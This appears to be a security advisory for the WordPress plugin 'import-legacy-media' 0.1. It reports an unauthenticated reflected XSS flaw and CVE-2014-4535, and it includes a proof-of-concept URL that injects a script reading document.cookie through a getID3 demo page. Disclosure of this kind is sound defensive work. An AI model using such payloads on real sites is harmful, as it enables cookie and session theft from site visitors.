wp-plugin : import-legacy-media

Plugin Details
Plugin Name: wp-plugin : import-legacy-media
Effected Version : 0.1 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/importlegacymedia/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4535
Plugin Description :
[| The import lists all the files and folders in your web-site home directory. Navigate to sub-folders by clicking on 'folder' links. Files already in the Media Library are shown without a tickbox. Filters at the top of the file listing allow you to tick all the files, or just editable files. You can then also choose to untick 'old thumbnail' files. If there are other filters on file selection you would like to see, let me know on the [WP Forums](http://wordpress.org/tags/import-legacy-media?forum_id=10#postform). Files are imported with Title and Description data taken from (in order of precedence) ID3 tags, EXIF data, or the filename. Once you have selected the files you want imported click the 'Import Files' button. (This plugin comes complete with the getID3 PHP library in a sub-folder. The library can be found at http://www.getid3.org/.) = Version History = 0.1 - Just starting out, something to get it working ]